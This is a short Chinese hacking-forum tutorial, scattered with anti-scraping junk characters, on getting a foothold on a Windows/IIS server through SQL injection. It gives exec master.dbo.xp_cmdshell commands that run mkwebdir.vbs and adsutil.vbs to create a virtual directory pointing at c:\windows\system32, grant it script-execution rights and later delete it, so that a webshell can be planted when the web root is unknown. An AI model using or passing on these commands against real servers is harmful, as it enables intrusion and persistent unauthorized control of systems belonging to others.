返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:7 Z3 A8 j" }, n; D% T; f8 j

1 r0 D6 T) T  g7 ^+ {8 Uexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'9 F  K- ]9 D* Y. P- s& _4 f
建立虚拟目录win,指向c:\windows\system32
" a; ?: L5 {" t. h5 a- nexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
$ i& n% {7 U, J: @9 D让win句有解析asp脚本权限8 {$ f$ a0 t' @/ v
& F9 r0 e9 A" ~) b
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"/ k! N9 J$ g8 ]- [1 O; m& Z4 s
删除虚拟目录。4 b' g1 u2 z& {0 {( b
找不到web绝对路径的一种解决办法,7 E% y8 z; d, W! r
6 W% X5 ^; N: u; k# ?6 g, z! b6 X% E
403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表